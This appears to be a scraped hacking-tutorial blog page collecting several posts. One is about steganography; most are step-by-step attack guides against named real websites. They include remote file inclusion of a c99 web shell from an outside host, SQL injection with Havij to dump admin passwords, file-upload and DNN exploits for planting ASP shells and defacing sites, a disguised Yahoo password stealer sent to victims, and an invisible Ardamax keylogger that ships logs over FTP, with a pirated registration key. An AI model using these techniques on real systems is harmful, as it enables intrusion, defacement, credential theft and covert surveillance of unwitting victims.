How to Hide File Behind Video (Steganography)

First , DOWNLOAD this software...

Now open, Steganography


Step-1


Now, Click here ( to select file you want to sent)

Step-2


Now , click add button (to add file to be hidden)

Now, you can click on  next  ( to select file or any message which you want to hide within the Video)

Step-3


Now, type your password and click on Hide ( your Video will get hide and you can send to anybody)

Now, Your file is hidden

For Unhiding :-

• First , select the  file which you want to unhide
• Now , ENTER the password earlier typed
• Now, Click on unhide to see the result

Enjoy.....!!!

Read More

RFI (Remote File Inclusion) : Website Hacking Tutorial

Hello friends here i am posting one another method of website hacking called RFI (Remote File Inclusion)
Remote File Inclusion (RFI) is a type of vulnerability often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation.

Lets Start
1st Step : Find a Vunerable websites using Google Dork

Click here to get more RFI dork

“inurl:index.php?page=” its a Dork of RFI hacking
It will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command
www.targetsite.com/index.php?page=www.google.com

see example of this website http://www.cbspk.com
http://www.cbspk.com/v2/index.php?page=http://www.google.com

If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack.

Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:

http://www.sh3ll.org/c99.zip

Now we need to upload the shells to a webhosting site such as ripway.com, viralhosts.com,110mb.com or another free hosts etc.

Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is http://www.sh3ll.org/c99.txt?

Now here is how a hacker would execute the following command to gain access

http://www.cbspk.com/v2/index.php?page=http://www.sh3ll.org/c99.txt?

Don't Forget To add “?” after .txt at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it.

Read More

Hack Yahoo Password With Magic Ps 1.5 Final

First Download
MPS 1.5 Final

Magic Ps 1.5 Final
==================

How to use ??
=============

1st :- select Send Y! Mess Pass , Send NetWork IP , Send Computer Name and Auto Startup

2nd :- After Select Fake Error Message

3rd :- Type your yahoo ID ( Note : Just type ID don't use @yahoo.com Ex : John_26 )

4th :- then Choose Icon (Just for .exe and .scr)

5th :- MPS creator -> File Name : any name.jpg.scr

6th :- Create MPS

Now create ur file...send to ur victim..

Enjoy....

Read More

SQL Injection through Havij (Full Tutorial)

Firstly i am going to introduce the term havij :)
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.
The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injecting vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.


Download havij 1.10

First Find a sqli infected site .Now here i found a vulernable site

http://www.hypetrading.com/productinfo.php?id=285

Now Let's start

Open havij and copy and paste infected link as shown in figure

Now click in the "Analyze"

Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx

Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed

After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure

In that Just put mark username and password and click "Get data"

Bingo Got now id and pass that may be admin...
The pass will get as md5 you can crack it also using this tool as shown in figure...

Read More

HACK WebSites RTE Webwiz Vulnerability -File Upload Vulnerability

Hi Guyz In this Tutorial i will tell you how to hack web sites with Rte Remote file upload Vulnerability

» 1. use these google dorks for find Sites

inurl:rte/my_documents/my_files
inurl:/my_documents/my_files/

The Exploit is

site.com/rte/RTE_popup_file_atch.asp

site.com/admin/RTE_popup_file_atch.asp

For Example i Got a Web Site.
Site:- http://www.billkonigsberg.com
Vulnerability http://www.billkonigsberg.com/RTE_popup_file_atch.asp

it will look like Screenshot Below

You can upload your html defacepage here and in left site after upload your page will show

You can also upload shell there asp or jpg shell

Read More

How to Hack Facebook/Yahoo/Msn With Istealer Complete Video Tutorial

This is Great Tutorail 1st Time Introducing with complete detailed
Download Video Tutorial

http://adf.ly/3u87i

Download Istealer 6.3
http://adf.ly/3u8C7

Read More

DNN method Complete Tutorial How to hack a Web site with Asp shell

Step:1
http://www.google.com

Step 2:Now enter this dork (this is Dork for find DNN Valn sites)

:inurl:/tabid/36/language/en-US/Default.aspx
or
inurl:/Fck/fcklinkgallery.aspx

this is a dork to find the Portal Vulnerable sites, use it wisely.

Step 3:
it will show you many sites, Copy any one of site.

Step 4:
For example take this site.
Example: http://www.itservicespro.net

Step 5: Now Paste after the site url this
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

so Site is this :
http://itservicespro.net/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

so it will look like this (screenshot below)

Note: if it will show you like this (see screenshot below) its mean site could not hack find another site

Now Click on File ( A File On Your Site )

Step 8:Now replace the URL in the address bar with a Simple Script

javascript:__doPostBack('ctlURL$cmdUpload','')

Step 9:You will Find the Upload Option

Step 10:
Select Root

Step 11:
Upload your shell ASp Download it here

After upload
go for your shell www.yoursite.com/portals/0/yourshellname.asp;.jpg
EXample : http://www.itservicespro.net/portals/0/umer.asp;.jpg
so you upload shell and shell is front of you look like this (screenshot below)
Click on ( DIR ) again and again till you will see admin

so when it will show you this page admin area page click on UPLOAD FILE TO C:\WEBSITES\WWW.ITSERVICESPRO.NET\WEBSITE\

and upload your deface index page so
this is your result www.site.com/urpagename.html
for example see this http://www.itservicespro.net/roy.html

If you want to deface main page then click on Admin dir and search for index htm or html and click on Edit and copy your deface page code and replace there...:)
thats it (Tutorial by Ronny Roy)
All this for Educational purpose

Read More

Hack any account with ArdmaX Keylogger 3.0 Tutorial with Registration Key full Detailes Tutorial

◄◄~~ARDAMAX TUTORIAL~~►►

Download The Ardamax Keylogger 2.85
Ardamax Keylogger 2.85

Download it and Install in your computer.

2-.Now right-hand click it and click ‘Enter registration key….

3-Enter the Name and password in the box fields
Name: Kimberley Ronald
Key: RGA3Y3A-M3D88-T3HU5-T28TM-G47A S-SFTD7-624JC

4.Once done click ‘Ok’ and you should get a pop-up saying ‘Registration code is accepted. Thank you for registration!

II. Creating the Keylogger Remote file:

1. Now your going to make the Keylogger Remote file (The thing you give to your victim). Click ‘Remote Installation…’,

click ‘Next’
2.Now,you should see this.

3.If you want to bind Keylogger Remote file with another application or file click the box that says ‘Append keylogger Remote file to file or another application’ and browse file or application that you want to bind it with.. I would prefer to skip this and bind the keylogger after creating the remote file.

4. Now click ‘Additional components’ and tick ‘Installation Package Bilder’ like done in the screenshot.

5.Now you should be at ‘Invisibility’, make sure all the boxes are ticked, then click ‘Next’.

6. Now you should be at ‘Security’, click ‘Enable’ and put your password (it can be any password you like, make it something easy so you can remember). Once done, make sure all the boxes are ticked and click ‘Next’.. Or else SkIp this also

7-untik the update optiong

8. Ok, you should now be at ‘Options’, use setting like done in screenshots.You can also select it destruction date

9. Ok, now you should be at ‘Control’, click the box that says ‘Send logs every’, now make it so it sends logs every 20 minutes, then where it says ‘Delivery’, un-tick ‘Email’ and tick ‘FTP’, then where it says ‘Include’ un-tick ‘Screenshots’, now un-tick the box where it says ‘Send only if log size exceeds’, once thats done, it should all look like it does in this screenshot:

10. Now you should be at ‘FTP’, create a free account at http://www.drivehq.com then make sure your at ‘Online Storage’, then make a new folder called: Logs (this is where the logs are sent to when you keylogg someone), Now on your FTP on Ardamax Keylogger, where it says ‘FTP Host:’, put this:
FTP.DriveHQ.com
Now where it says ‘Remote Folder:’, put this: Logs
Now where it says ‘Userame:’ and ‘Password:’, put your DriveHQ username and password, then it should look something like this:


Now Click ‘Test’ and it should pop up like this

If not then see if the password and username is right.

Once done, do NOT change your DriveHQ password or rename/delete the folder called ‘Logs’, if you do, the logs will not come through.

11. You should now be at ‘Control’, un-tick ‘Enable Screenshots Capturing’ then click ‘Next’.

12. Now you can change name and icon your Keylogger Engine as you want it to look like.

ust click ‘Finish’.
13.After you click ‘Finish’ you should see this:


Now Your Remote File Is Created

Thats it guyzzz Enjoy Hacking

Read More